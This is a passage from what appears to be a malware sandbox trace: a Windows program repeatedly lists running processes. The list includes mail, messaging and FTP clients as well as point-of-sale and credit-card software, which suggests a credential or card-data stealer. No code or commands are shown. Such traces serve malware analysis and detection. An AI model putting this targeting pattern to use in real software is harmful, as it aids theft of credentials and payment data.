cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0251.069] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0251.071] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0251.073] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0251.077] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0251.079] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0251.080] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0251.082] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0251.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0251.085] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0251.087] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0251.088] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0251.094] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0251.096] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0251.097] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0251.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0251.100] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0251.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0251.103] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0251.109] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0251.111] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0251.112] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0251.114] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0251.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0251.117] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0251.118] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0251.169] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0251.171] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0251.172] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0251.173] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0251.175] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0251.176] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0251.178] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0251.179] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0251.181] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0251.186] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0251.188] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0251.189] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.190] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.192] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.193] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0251.195] CloseHandle (hObject=0x1018) returned 1 [0251.195] Sleep (dwMilliseconds=0x64) [0251.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0251.398] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.399] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.401] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.404] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.406] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.407] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.408] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.410] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.411] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.413] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.415] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.417] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.420] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.421] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.423] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.424] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.426] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.427] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.428] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0251.430] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0251.431] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0251.462] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.464] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.465] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0251.466] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0251.468] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0251.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0251.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.472] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0251.473] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0251.475] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.476] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0251.478] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0251.482] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0251.483] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0251.485] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0251.486] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0251.487] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0251.488] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0251.490] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0251.491] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0251.492] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0251.494] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 